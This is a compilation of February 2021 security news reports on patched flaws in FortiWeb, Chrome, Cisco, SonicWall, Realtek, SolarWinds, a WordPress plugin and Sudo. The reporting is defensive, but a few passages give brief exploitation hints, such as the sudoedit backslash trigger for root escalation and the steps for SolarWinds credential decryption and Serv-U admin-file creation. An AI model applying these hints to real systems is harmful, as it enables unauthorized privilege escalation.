Fortinet addresses 4 vulnerabilities in FortiWeb web application firewalls
6.2.2021
Vulnerebility
Securityaffairs
Security vendor Fortinet has addressed four vulnerabilities in FortiWeb web
application firewalls, including a Remote Code Execution flaw.
Fortinet has
addressed four vulnerabilities in FortiWeb web application firewalls that were
reported by Positive Technologies expert Andrey Medov.
The first vulnerability, tracked as CVE-2020-29015, is a blind SQL injection that resides in the FortiWeb user interface. The flaw could be exploited by an unauthorized attacker to remotely execute arbitrary SQL queries by sending a request with an authorization header containing a malicious SQL command.
“A blind SQL injection in the user interface of FortiWeb may allow an unauthenticated, remote attacker to execute arbitrary SQL queries or commands by sending a request with a crafted Authorization header containing a malicious SQL statement.” reads the advisory published by Fortinet.
The flaw received a CVSS score of 6.4/10, the vendor reccomeds to update FortiWeb 6.3.x and 6.2.x to versions 6.3.8 and 6.2.4, respectively.
Medov also found two stack buffer overflow issues tracked CVE-2020-29016 and
CVE-2020-29019, both received a CVS score of 6.4.
The CVE-2020-29016 could be
exploited by an unauthorized remote attacker to overwrite the content of the
stack and execute arbitrary code by sending a request with a specially generated
GET parameter certname.
Customers using FortiWeb 6.3.x and 6.2.x have to update to versions 6.3.6 and 6.2.4, respectively.
The CVE-2020-29019 vulnerability can be exploited by attackers to mount a DoS attack on the httpd daemon using a request with a specially generated cookie parameter. The vendor recommends updating FortiWeb 6.3.x and 6.2.x to versions 6.3.8 and 6.2.4.
The fourth vulnerability, tracked as CVE-2020-29018, is a format string vulnerability that allows remote attackers to read the memory content, get sensitive data, and execute unauthorized code or commands using the redir parameter. The flaw received a CVSS score of 5.3, it has been addressed with the release of FortiWeb version 6.3.6.
“The most dangerous of these four vulnerabilities are the SQL Injection (CVE-2020-29015) and Buffer Overflow (CVE-2020-29016) as their exploitation does not require authorization.” Andrey Medov at Positive Technologies explains. “The first allows you to obtain the hash of the system administrator account due to excessive DBMS user privileges, which gives you access to the API without decrypting the hash value. The second one allows arbitrary code execution. Additionally, the format string vulnerability (CVE-2020-29018) also may allow code execution, but its exploitation requires authorization.”
Google Chrome, Microsoft IE Zero-Days in Crosshairs
6.2.2021
Vulnerebility
Securityweek
Google late Thursday night shipped an emergency patch to close a Chrome browser vulnerability that was being used in mysterious zero-day attacks.
The Google Chrome patch, which is being pushed via the browser’s automatic self-patching, covers a critical vulnerability in V8, Google’s JavaScript and WebAssembly engine.
The “high-risk” vulnerability affects users on Windows, MacOS and Linux platforms.
The Google advisory is scant on details:
High CVE-2021-21148: Heap buffer overflow in V8. Reported by Mattias Buelens on 2021-01-24
Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild.We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.
Technical details on the flaw are being held private. The patch release comes amidst reports that a Google Chrome zero-day exploit was being used in the North Korean government-backed attacks against numerous researchers and personalities scattered across the offensive and defensive security space.
Beyond a blog post with the initial warning from its TAG (Threat Analysis Group), Google has been quiet on the possible use of a Chrome zero-day was used in the North Korean social-engineering campaign and whether this latest patch provides cover for that vulnerability.
A source tells SecurityWeek the two issues are “unrelated” but stressed that a comprehensive investigation has not yet been completed.
Adding fuel to the fire, South Korean security vendor ENKI has published a claim that a Microsoft Internet Explorer (IE) browser zero-day may also be linked to the North Korean campaign. ENKI said its own researchers were targeted by the operation and the targeting method included the use of malicious MHTML files that led to drive-by IE downloads.
Strangely, public data shows that the Internet Explorer browser continues to be widely used in South Korea.
Microsoft has itself documented its own findings on the North Korean hacks against white-hat researchers, threat intel professionals and offensive security professionals but Microsoft does not mention the use of an Internet Explorer zero-day.
Microsoft does, however, describe the use of MHTML files aimed specifically at the older Internet Explorer:
In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.
A Microsoft spokesperson told SecurityWeek the ENKI findings were originally reported through what was described as an “incorrect channel.”
“Microsoft has a customer commitment to investigate reported security issues and we will provide updates for impacted devices as soon as possible.” the spokesperson added.
Security researchers at Kaspersky have linked the attacks to a sub-group under Lazarus, the infamous North Korean threat actor known for launching destructive malware and ransomware attacks across the globe.
Critical Flaws Reported in Cisco VPN Routers for Businesses—Patch ASAP
6.2.2021
Vulnerebility
Thehackernews
Cisco has rolled out fixes for multiple critical vulnerabilities in the web-based management interface of Small Business routers that could potentially allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device.
The flaws — tracked from CVE-2021-1289 through CVE-2021-1295 (CVSS score 9.8) — impact RV160, RV160W, RV260, RV260P, and RV260W VPN routers running a firmware release earlier than Release 1.0.01.02.
Along with the aforementioned three vulnerabilities, patches have also been
released for two more arbitrary file write flaws (CVE-2021-1296 and
CVE-2021-1297) affecting the same set of VPN routers that could have made it
possible for an adversary to overwrite arbitrary files on the vulnerable system.
All the nine security issues were reported to the networking equipment maker by
security researcher Takeshi Shiomitsu, who has previously uncovered similar
critical flaws in RV110W, RV130W, and RV215W Routers that could be leveraged for
remote code execution (RCE) attacks.
While exact specifics of the vulnerabilities are still unclear, Cisco said the flaws —
CVE-2021-1289, CVE-2021-1290, CVE-2021-1291, CVE-2021-1292, CVE-2021-1293,
CVE-2021-1294, and CVE-2021-1295 are a result of improper validation of HTTP
requests, allowing an attacker to craft a specially-crafted HTTP request to the
web-based management interface and achieve RCE.
CVE-2021-1296 and
CVE-2021-1297 are due to insufficient input validation, permitting an attacker
to exploit these flaws using the web-based management interface to upload a file
to a location that they should not have access to.
Separately, another set of
five glitches (CVE-2021-1314 through CVE-2021-1318) in the web-based management
interface of Small Business RV016, RV042, RV042G, RV082, RV320, and RV325
routers could have granted an attacker the ability to inject arbitrary commands
on the routers that are executed with root privileges.
Lastly, Cisco also addressed 30 additional vulnerabilities (CVE-2021-1319 through CVE-2021-1348), affecting the same set of products, that could allow an authenticated, remote attacker to execute arbitrary code and even cause a denial-of-service condition.
"To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device," Cisco said in an advisory published on February 3.
Kai Cheng from the Institute of Information Engineering, which is part of the Chinese Academy of Sciences, has been credited with reporting the 35 flaws in the router management interface.
The company also noted there's been no evidence of active exploitation attempts in the wild for any of these flaws, nor are there any workarounds that address the vulnerabilities.
Google addresses Chrome zero-day flaw actively exploited in the wild
5.2.2021
Vulnerebility
Securityaffairs
Google has addressed an actively exploited zero-day vulnerability, tracked as
CVE-2021-21148, with the release of the Chrome 88.0.4324.150 version.
Google
released Chrome 88.0.4324.150 version that addressed an actively exploited
zero-day security vulnerability.
The vulnerability is a Heap buffer overflow that resides in the V8, which is an open-source high-performance JavaScript and WebAssembly engine, written in C++.
The flaw was rated by Google as high severity, it was reported by Mattias Buelens on January 24th, 2021.
The 88.0.4324.150 version of the Stable channel will be available for Windows, Mac and Linux in the coming days/weeks.
“CVE-2021-21148: Heap buffer overflow in V8. Reported by Mattias Buelens on 2021-01-24.” reads the announcement published by Google.
“Google is aware of reports that an exploit for CVE-2021-21148 exists in the
wild. We would also like to thank all security researchers that worked with us
during the development cycle to prevent security bugs from ever reaching the
stable channel.”
Google did not share details about the attacks and the
attackers.
“Access to bug details and links may be kept restricted until a majority of users are updated with a fix.” Google adds. “We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.”
In 2020, Google addresses five Chrome zero-days actively exploited in the wild.
In October, the IT giant addressed the following three zero-days:
CVE-2020-15999 – The flaw is a memory corruption bug that resides in the
FreeType font rendering library, which is included in standard Chrome releases.
CVE-2020-16009 – is a Heap buffer overflow in Freetype in Google Chrome.
CVE-2020-16010 – affects the browser’s user interface (UI) component in Chrome
for Android.
In November, the company addressed two other zero-day
vulnerabilities, actively exploited in the wild.
Both zero-day flaws, tracked as CVE-2020-16013 and CVE-2020-16017, were reported by anonymous sources.
SonicWall released patch for actively exploited SMA 100 zero-day
5.2.2021
Vulnerebility
Securityaffairs
SonicWall has released a security patch to address the zero-day flaw actively
exploited in attacks against the SMA 100 series appliances.
SonicWall this
week released firmware updates (version 10.2.0.5-29sv) to address an actively
exploited zero-day vulnerability in Secure Mobile Access (SMA) 100 series
appliances.
The vulnerability, tracked as CVE-2021-20016, has been rated as critical and received a CVSS score of 9.8.
A vulnerability results in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product, it could be exploited by a remote, unauthenticated attacker for credential access on SMA100 build version 10.x.
“A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker. This vulnerability impacts SMA100 build version 10.x.” reads the advisory.
Customers have to update their installs as soon as possible, the company also revealed that the updates includes additional secuity enhancements.
“SonicWall is announcing the availability of an SMA 100 series firmware 10.2.0.5-29sv update to patch a zero-day vulnerability on SMA 100 series 10.x code. All SMA 100 series users must apply this patch IMMEDIATELY to avoid potential exploitation.” reads the advisory published by the company.
The updates are available for the following appliances:
Physical Appliances: SMA 200, SMA 210, SMA 400, SMA 410
Virtual Appliances:
SMA 500v (Azure, AWS, ESXi, HyperV)
SonicWall disclosed a security breach on
January 22, it blamed sophisticated threat actors for the intrusion.
On January, 29 SonicWall announced it was investigating the presence of a zero-day vulnerability in the Secure Mobile Access (SMA) gateways.
SMA gateways are used by enterprise organizations to provide access to resources on intranets to remote employees.
At the end of January, security experts from the firm NCC Group have detected “indiscriminate” exploitation of a SonicWall zero-day in attacks in the wild.
NCC Group first disclosed the attacks on SonicWall devices on Sunday but did not provide details about the flaw exploited by the threat actors.
At the time, the NCC team confirmed to have demonstrated how to exploit a possible candidate for the vulnerability.
SonicWall experts pointed out that proof of concept (PoC) exploit code utilizing the Shellshock exploit shared on social media is not effective against its devices.
“We’re also aware of social media posts that shared either supposed proof of concept (PoC) exploit code utilizing the Shellshock exploit, or screenshots of allegedly compromised devices. We have confirmed that the Shellshock attack has been mitigated by patches that we released in 2015. We have also tested the shared PoC code and have so far concluded that it is not effective against firmware released after the 2015 patch.” continues the update. “However, we’ll continue to closely monitor any new posts and investigate new information. This should also serve as a reminder to our customer base to always patch and keep current on internet facing devices.”
Waiting for the patches were available, SonicWall also released an updated security best practices guide for the SMA 100 series devices.
Cisco fixes critical remote code execution issues in SMB VPN routers
5.2.2021
Vulnerebility
Securityaffairs
Cisco addressed multiple pre-auth remote code execution (RCE) flaws in small
business VPN routers that allow executing arbitrary code as root.
Cisco has
fixed several pre-auth remote code execution (RCE) issues in multiple small
business VPN routers. The flaws could be exploited by unauthenticated, remote
attackers to execute arbitrary code as root on vulnerable devices.
The flaws (CVE-2021-1289, CVE-2021-1290, CVE-2021-1291, CVE-2021-1292, CVE-2021-1293, CVE-2021-1294, CVE-2021-1295) have received a CVSS score of 9.8/10.
The flaws reside in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers
“Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device.” reads the advisory published by Cisco.
“These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device.”
The IT giant revealed that the vulnerabilities affect the following Cisco Small Business Routers if they are running a firmware release earlier than Release 1.0.01.02:
RV160 VPN Router
RV160W Wireless-AC VPN Router
RV260 VPN Router
RV260P
VPN Router with POE
RV260W Wireless-AC VPN Router
while the following
devices are not affected:
RV340 Dual WAN Gigabit VPN Router
RV340W Dual
WAN Gigabit Wireless-AC VPN Router
RV345 Dual WAN Gigabit VPN Router
RV345P Dual WAN Gigabit POE VPN Router
Cisco has addressed the flaw with the
release of firmware version 1.0.01.02 and later, the vendor added that there are
no workarounds that address these vulnerabilities.
The good news is that Cisco Product Security Incident Response Team (PSIRT) is not aware of attacks in the wild exploiting the above vulnerabilities.
The vulnerabilities were reported to Cisco by T. Shiomitsu from Trend Micro Zero Day, swings of Chaitin Security Research Lab, and simp1e of 1AQ Team.
Cisco today has also addressed high severity vulnerabilities impacting other business routers and the IOS XR software.
Last month, Cisco has also patched several pre-auth RCE vulnerabilities affecting multiple SD-WAN products and the Cisco Smart Software Manager software.
Cisco Patches Critical Vulnerabilities in Small Business Routers, SD-WAN
5.2.2021
Vulnerebility
Securityweek
Cisco this week released software updates to address multiple vulnerabilities across its product portfolio, including critical severity bugs in several small business VPN routers and SD-WAN products.
The company warned that the web-based management interface of small business RV160, RV160W, RV260, RV260P, and RV260W VPN routers is affected by seven severe vulnerabilities that could be abused by unauthenticated, remote attackers to execute arbitrary code as root.
The issue, Cisco says, exists because of improper validation of HTTP requests. Rated critical severity (CVSS score of 9.8), the flaws were addressed with the release of firmware versions 1.0.01.02 and later for all of the affected products. Two high severity vulnerabilities were also fixed in these devices.
The tech company also released fixes for six bugs in SD-WAN products, the most important of which is rated critical severity (CVSS score 9.9). While not dependent on each other, the resolved issues could be abused to perform actions with root privileges on the affected devices.
Created by the improper input validation of user-supplied input, the flaws impact SD-WAN vBond Orchestrator Software, SD-WAN vEdge Cloud Routers, SD-WAN vEdge Routers, SD-WAN vManage Software, and SD-WAN vSmart Controller Software.
Cisco addressed these security holes in SD-WAN releases 19.2.4, 20.1.2, 20.3.2, and 20.4.1. The company also notes that it is not aware of these bugs being exploited in the wild.
This week, the company also detailed numerous high severity flaws in small business RV series routers, including a set of 30 bugs leading to arbitrary code execution or denial of service, and another of 5 issues that a remote attacker could exploit to inject arbitrary commands and have them executed with root privileges.
Caused by improper validation of user-supplied input, the flaws impact RV016, RV042, RV042G, RV082, RV320, and RV325 series routers, and were addressed with the release of firmware version 1.5.1.13 for RV320 and RV325 routers.
The Cisco RV016, RV042, RV042G, and RV082 routers, however, won’t receive patches, because they have already reached end-of-life status.
Other high risk vulnerabilities that Cisco patched this week affect IOS XR software: one denial of service in the IPv6 protocol handling and two in the ingress packet processing function of IOS XR software, and two image verification bugs and one privilege escalation that affect IOS XR software for the Cisco 8000 series routers and Network Convergence System (NCS) 540 series routers.
Multiple high severity issues were addressed in SD-WAN products as well, including five flaws that could lead to denial of service, and three authorization bypasses that could allow attackers to modify configurations, access sensitive information, or view data without authorization.
Cisco also released patches for medium severity flaws in Webex, Unified Computing System (UCS), IOS XR Software, Managed Services Accelerator (MSX), and DNA Center, and announced that it would release software updates to fix multiple bugs in the DNS forwarder implementation of dnsmasq.
On Wednesday, the tech company expanded the list of products affected by the recent Sudo vulnerability with the addition of Virtual Topology System (formerly Cisco Virtual Systems Operations Center) - VTSR VM and Ultra Cloud.
Further information on the vulnerabilities Cisco has addressed in its products this week can be found on the company’s security portal.
Vulnerabilities in Realtek Wi-Fi Module Expose Many Devices to Remote Attacks
5.2.2021
Vulnerebility
Securityweek
Major vulnerabilities in the Realtek RTL8195A Wi-Fi module expose embedded devices used in a myriad of industries to remote attacks, researchers with automated device security platform provider Vdoo reveal.
The low-power Wi-Fi module is designed for use in embedded devices, and is being used in a broad range of industries, including automotive, agriculture, energy, healthcare, industrial, and security.
The RTL8195A chip supports WEP, WPA and WPA2 authentication modes, and Vdoo discovered that the WPA2 handshake mechanism is prone to stack overflow and out-of-bounds read bugs.
Tracked as CVE-2020-9395, the most severe of the flaws is a remotely exploitable stack overflow that could lead to a complete takeover of the module and the device’s wireless communications. The vulnerability can be exploited by an attacker in the proximity of a vulnerable system, even if they don’t know the Wi-Fi network password (Pre-Shared-Key, or PSK).
Two other vulnerabilities (an out-of-bounds read and a stack-based buffer overflow) could also be exploited without knowing the network security key (the PMK, which is derived from the PSK), to execute code remotely or cause a denial of service (DoS) condition.
All of the remaining three vulnerabilities are stack-based buffer overflow issues that could lead to remote code execution, but exploitation requires for the attacker to know the network’s PSK. Thus, the use of a strong, private WPA2 passphrase should prevent exploitation of these bugs.
Realtek has published an advisory for CVE-2020-9395 only, revealing that RTL8711AM, RTL8711AF, and RTL8710AF modules are also vulnerable.
“An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6. A stack-based buffer overflow exists in the client code that takes care of WPA2’s 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer,” Realtek explains.
According to Vdoo’s researchers, because no mitigating factors are in place, exploitation of this vulnerability is trivial. Exploitation is possible regardless of whether the victim is the client or the access point.
Vdoo says all of these vulnerabilities have been addressed in the latest version of Ameba Arduino (2.0.8 and above). Updated versions of the Ameba SDK are available on Realtek’s website.
Device versions built after March 3, 2020, are patched against CVE-2020-9395, while versions built after April 21, 2020 are completely patched against all issues.
SonicWall Patches SMA Zero-Day Vulnerability Exploited in Attacks
5.2.2021
Vulnerebility
Securityweek
SonicWall on Wednesday announced that it released firmware updates for its Secure Mobile Access (SMA) 100 series appliances to patch an actively exploited zero-day vulnerability.
The patch is included in firmware version 10.2.0.5-29sv, which users have been advised to immediately apply to avoid potential attacks. The vendor said the patch also contains additional code designed to strengthen devices.
SonicWall, which specializes in firewalls and other cybersecurity solutions, previously told SecurityWeek that a few thousand devices are exposed to attacks due to the vulnerability.SonicWall patches SMA zero-day
The critical patch can be applied to SMA 200, 210, 400 and 410 physical appliances, and SMA 500v virtual appliances on Azure, AWS, ESXi and Hyper-V. Other SonicWall products do not appear to be impacted.
The vulnerability, which has been rated critical with a CVSS score of 9.8, now also has a CVE identifier: CVE-2021-20016.
The company explained that a hacker can launch a “remote code execution attack” after gaining access to admin credentials.
“A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker,” reads SonicWall’s advisory for CVE-2021-20016.
SonicWall informed customers on January 22 that its internal systems were targeted in an attack apparently launched by sophisticated threat actors that may have exploited zero-day vulnerabilities in the company’s secure remote access products.
The company launched an investigation, but couldn’t confirm the existence of a zero-day vulnerability in its SMA 100 series appliances until February 1, shortly after cybersecurity firm NCC Group reported seeing “indiscriminate” attempts to exploit what appeared to be a previously unknown security flaw.
Until the patches were made available, SonicWall shared some recommendations on how customers can prevent potential attacks, including by enabling multi-factor authentication, blocking access to appliances on the firewall, shutting down vulnerable devices, or downgrading firmware to a version that is not affected.
Shortly after SonicWall disclosed the breach, some anonymous individuals claimed the company was hit by ransomware and the attackers had stolen source code and customer data, but none of those claims have been confirmed. The “proof” seen by SecurityWeek at the time seemed questionable.
SonicWall says it cannot provide any additional information at this time.
New Chrome Browser 0-day Under Active Attack—Update Immediately!
5.2.2021
Vulnerebility
Thehackernews
Google has patched a zero-day vulnerability in Chrome web browser for desktop that it says is being actively exploited in the wild.
The company released 88.0.4324.150 for Windows, Mac, and Linux, with a fix for a heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.
"Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild," the company said in a statement.
The security flaw was reported to Google by Mattias Buelens on January 24.
password auditor
Previously on February 2, Google addressed six issues in
Chrome, including one critical use after free vulnerability in Payments
(CVE-2021-21142) and four high severity issues in Extensions, Tab Groups, Fonts,
and Navigation features.
While it's typical of Google to limit details of the vulnerability until a majority of users are updated with the fix, the development comes weeks after Google and Microsoft disclosed attacks carried out by North Korean hackers against security researchers with an elaborate social engineering campaign to install a Windows backdoor.
With some researchers infected simply by visiting a fake research blog on fully patched systems running Windows 10 and Chrome browser, Microsoft, in a report published on January 28, had hinted that the attackers likely leveraged a Chrome zero-day to compromise the systems.
Although it's not immediately clear if CVE-2021-21148 was used in these attacks, the timing of the revelations and the fact that Google's advisory came out exactly one day after Buelens reported the issue implies they could be related.
In a separate technical write-up, South Korean cybersecurity firm ENKI said the North Korean state-sponsored hacking group known as Lazarus made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.
"The secondary payload contains the attack code that attacks the vulnerability of the Internet Explorer browser," ENKI researchers said.
It's worth noting that Google last year fixed five Chrome zero-days that were actively exploited in the wild in a span of one month between October 20 and November 12.
Critical Bugs Found in Popular Realtek Wi-Fi Module for Embedded Devices
5.2.2021
Vulnerebility
Thehackernews
Major vulnerabilities have been discovered in the Realtek RTL8195A Wi-Fi module that could have been exploited to gain root access and take complete control of a device's wireless communications.
The six flaws were reported by researchers from Israeli IoT security firm Vdoo.
The Realtek RTL8195A module is a standalone, low-power-consumption Wi-Fi hardware module targeted at embedded devices used in several industries such as agriculture, smart home, healthcare, gaming, and automotive sectors.
It also makes use of an "Ameba" API, allowing developers to communicate with the device via Wi-Fi, HTTP, and MQTT, a lightweight messaging protocol for small sensors and mobile devices.
password auditor
Although the issues uncovered by Vdoo were verified only on
RTL8195A, the researchers said they extend to other modules as well, including
RTL8711AM, RTL8711AF, and RTL8710AF.
The flaws concern a mix of stack overflow, and out-of-bounds reads that stem
from the Wi-Fi module's WPA2 four-way handshake mechanism during authentication.
Chief among them is a buffer overflow vulnerability (CVE-2020-9395) that permits an attacker in the proximity of an RTL8195 module to completely take over the module, without having to know the Wi-Fi network password (or pre-shared key) and regardless of whether the module is acting as a Wi-Fi access point (AP) or client.
Two other flaws can be abused to stage a denial of service, while another set of three weaknesses, including CVE-2020-25854, could allow exploitation of Wi-Fi client devices and execute arbitrary code.
Thus in one of the potential attack scenarios, an adversary with prior knowledge of the passphrase for the WPA2 Wi-Fi network that the victim device is connected to can create a malicious AP by sniffing the network's SSID and Pairwise Transit Key (PTK) — which is used to encrypt traffic between a client and the AP — and force the target to connect to the new AP and run malicious code.
Realtek, in response, has released Ameba Arduino 2.0.8 with patches for all the six vulnerabilities found by Vdoo. It's worth noting that firmware versions released after April 21, 2020, already come with the necessary protections to thwart such takeover attacks.
"An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6," the company said in a security bulletin. "A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer."
SolarWinds Orion Bug Allows Easy Remote-Code Execution and Takeover
4.2.2021
Vulnerebility
Threatpost
The by-now infamous company has issued patches for three security vulnerabilities in total.
Three serious vulnerabilities have been found in SolarWinds products: Two in the Orion User Device Tracker and one in the Serv-U FTP for Windows product. The most severe of these could allow trivial remote code execution with high privileges.
The SolarWinds Orion platform is the network management tool at the heart of the recent espionage attack against several U.S. government agencies, tech companies and other high-profile targets. It allows users to manage devices, software and firmware versioning, applications and so on, and has full visibility into enterprise customer networks.
These fresh vulnerabilities have not been shown to be used in the spy attack, but admins should nonetheless apply patches as soon as possible, according to Martin Rakhmanov, security research manager for SpiderLabs at Trustwave.
Trustwave is not providing specific proof-of-concept (PoC) code until Feb. 9, in order to give SolarWinds users a longer time to patch, he noted in a Wednesday blog posting.
Microsoft Messaging for SolarWinds Orion Takeover
The most critical bug
(CVE-2021-25274) does not require local access and allows complete control over
SolarWinds Orion remotely without having any credentials at all.
As a part of the platform installation, there is a setup for Microsoft Messaging Queue (MSMQ), which is a two-decade-old technology that is no longer installed by default on modern Windows systems.
“Improper use of MSMQ could allow any remote unprivileged user the ability to execute any arbitrary code in the highest privilege,” according to Trustwave’s advisory, issued on Wednesday.
Rakhmanov said that it’s possible for unauthenticated users to send messages to private queues over TCP port 1801.
“My interest was piqued and I [also] jumped in to look at the code that handles incoming messages,” he explained. “Unfortunately, it turned out to be an unsafe deserialization victim. [This] allows remote code execution by remote, unprivileged users through combining those two issues. Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system.”
Info-Stealing from the Orion Database
The second bug (CVE-2021-25275) was
also found in the SolarWinds Orion framework. It allows unprivileged users who
can log in locally or via Remote Desktop Protocol (RDP) to obtain a cleartext
password for the backend database for the Orion platform, called
SolarWindsOrionDatabaseUser – and from there set themselves up as an admin to
steal information.
“SolarWinds credentials are stored in an insecure manner that could allow any local users, despite privileges, to take complete control over the SOLARWINDS_ORION database,” according to Trustwave.
Permissions are generously granted to all locally authenticated users, Rakhmanov found, and authenticated users can generally read database file content. He ran “a simple grep” (a Unix command used to search files for the occurrence of a string of characters that matches a specified pattern) across the files installed by the product to look for a configuration file, which he located.
Inside the config file were the Orion backend database credentials, albeit encrypted.
“I spent some time finding code that decrypts the password but essentially, it’s a one-liner,” he noted.
Once an unprivileged user runs the decrypting code, they can get a cleartext password for the SolarWindsOrionDatabaseUser.
“The next step is to connect to the Microsoft SQL Server using the recovered account, and at this point, we have complete control over the SOLARWINDS_ORION database,” Rakhmanov explained. “From here, one can steal information or add a new admin-level user to be used inside SolarWinds Orion products.”
Adding Admin Users
The third issue is a SolarWinds Serv-U FTP vulnerability
(CVE-2021-25276). The product is used for secure transfer and large
file-sharing.
The bug allows local privilege escalation so that an attacker gains the ability to read, write to or delete any file on the system.
“Any local user, regardless of privilege, can create a file that can define a new Serv-U FTP admin account with full access to the C:\ drive,” according to Trustwave. “This account can then be used to log in via FTP and read or replace any file on the drive.”
Rakhmanov discovered that the platform’s directory access control lists allow complete compromise by any authenticated Windows user.
“Specifically, anyone who can log in locally or via Remote Desktop can just drop a file that defines a new user, and the Serv-U FTP will automatically pick it up,” he explained. “Next, since we can create any Serv-U FTP user, it makes sense to define an admin account by setting a simple field in the file and then set the home directory to the root of C:\ drive.”
SolarWinds patches are available, in Orion Platform 2020.2.4 and ServU-FTP 15.2.2 Hotfix 1.
Rakhmanov did issue a caveat on the fix for the CVE-2021-25275 info-stealing bug.
“After the patch is applied, there is a digital signature validation step performed on arrived messages so that messages having no signature or not signed with a per-installation certificate are not further processed,” he explained. “On the other hand, the MSMQ is still unauthenticated and allows anyone to send messages to it.”
TIM’s Red Team Research (RTR) discovered 2 new zero-day vulnerabilities in
WordPress Plugin Limit Login Attempts Reloaded
4.2.2021
Vulnerebility
Securityaffairs
Researchers from TIM’s Red Team Research (RTR) discovered 2 new zero-day
vulnerabilities in WordPress Plugin Limit Login Attempts Reloaded
Italy also
joins the security bug research, with the Red Team Research laboratory of TIM,
an important Italian telecommunications company.
Among the team’s objectives is to detect the vulnerabilities that a potential attacker could exploit to carry out cyber-attacks on TIM’s infrastructures and highlight the real impacts detected.
The activity is not limited only to the verification of known vulnerabilities, but includes specific research with the aim of discovering any new vulnerabilities not yet publicly known (vulnerability 0-day).
Today, TIM’s Red Team Research led by Massimiliano Brolli, discovered 2 new vulnerabilities in the Limit Login Attempts Reloaded WordPress Plugin. The flaws have been addressed by the plugin developer WPChef, between June and December 2020.
This WordPress plugin is aimed to be a brute force attack protection mechanism, and is currently installed in more than 1 million of active installations.
According to the plugin description from the author page:
“Limit Login Attempts Reloaded stops brute-force attacks and optimizes your site performance by limiting the number of login attempts that are possible through the normal login as well as XMLRPC, Woocommerce and custom login pages.”
Cybersecurity researcher Veno Eivazian identified two security issues as part of a series of laboratory tests. One is a rate limiting bypass under a non-default configuration, which effectively defeats the plugin purpose. The other one is an unauthenticated reflected XSS.
The first one, Improper Restriction of Excessive Authentication Attempts
(CWE-307), identified as CVE-2020-35590, has a CVSS3 score of 9.8.
The second
one, Improper Neutralization of Input During Web Page Generation (CWE-79),
identified as CVE-2020-35589, has a CVSS3 score of 5.4.
For some time, we
have been witnessing a series of undocumented vulnerabilities issued by this IT
security laboratory called Red Team Research (RTR), of the Italian
telecommunications company TIM, which has already identified 37 new CVEs for
today in about a year.
The laboratory has identified, from public sources available on the corporate website, vulnerabilities on vendors such as Oracle, Nokia, Siemens, Schneider Electric, QNAP, Selesta, WOWZA, MultiUX and recently WordPress, helping to improve overall IT security.
It is a small all-Italian “Progetto Zero”, which has attracted the attention of professionals, because every 10 days it publishes a new CVE, and all this is not bad at all.
The complete list of CVEs discovered by TIM researchers (formerly Telecom Italia S.p.A.) are available on the TIM Corporate websites:
TIM is one of the main Italian telecommunications companies, it is one of the few Italian industrial companies that has devoted such an important effort to the search for undocumented vulnerabilities.
Recent Sudo Vulnerability Affects Apple, Cisco Products
4.2.2021
Vulnerebility
Securityweek
Apple’s macOS Big Sur operating system and multiple Cisco products are also affected by the recently disclosed major security flaw in the Sudo utility.
Tracked as CVE-2021-3156 and referred to as Baron Samedit, the issue is a heap-based buffer overflow that can be exploited by unprivileged users to gain root privileges on the vulnerable host.
For privilege escalation to root, the user needs to leverage "sudoedit -s" along with a command-line argument ending with a single backslash character.
The vulnerability was patched in Sudo 1.9.5p2.
Researchers at cybersecurity firm Qualys, who discovered the bug, only tested it on several Linux distributions, such as Debian, Fedora, and Ubuntu, but did warn that most Unix- and Linux-based systems are likely affected by the vulnerability.
According to Hacker House co-founder Matthew Hickey, Apple’s macOS Big Sur is one of the affected operating systems.
“CVE-2021-3156 also impacts @apple MacOS Big Sur (unpatched at present), you can enable exploitation of the issue by symlinking sudo to sudoedit and then triggering the heap overflow to escalate one's privileges to 1337 uid=0,” he said on Twitter.
Replying to Hickey, Will Dormann, a researcher with Carnegie Mellon University's CERT Coordination Center, has confirmed that macOS Big Sur is indeed vulnerable.
Apple this week issued patches for more than 60 vulnerabilities in macOS Big Sur, Catalina, and Mojave, but none of these addresses the bug in Sudo.
In an advisory published last week but updated twice since, Cisco reveals that it is currently investigating which of its products are affected by the Baron Samedit vulnerability. Many products are not affected and some are still under investigation, but several have been confirmed to be impacted.
Specifically, the issue affects Firepower Threat Defense (FTD), Prime Collaboration Provisioning, Prime Service Catalog Virtual Appliance, Smart Software Manager On-Prem, Nexus 3000 series switches, Nexus 9000 series switches in standalone NX-OS mode, and Paging Server (InformaCast).
“An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the sudoedit command with crafted parameters or by executing a binary exploit. A successful exploit could allow the attacker to execute commands or binaries with root privileges,” the company explains.
To date, there are no indicators that the Sudo vulnerability is being exploited in live attacks, but users are advised to apply patches for it as soon as they become available for their products.
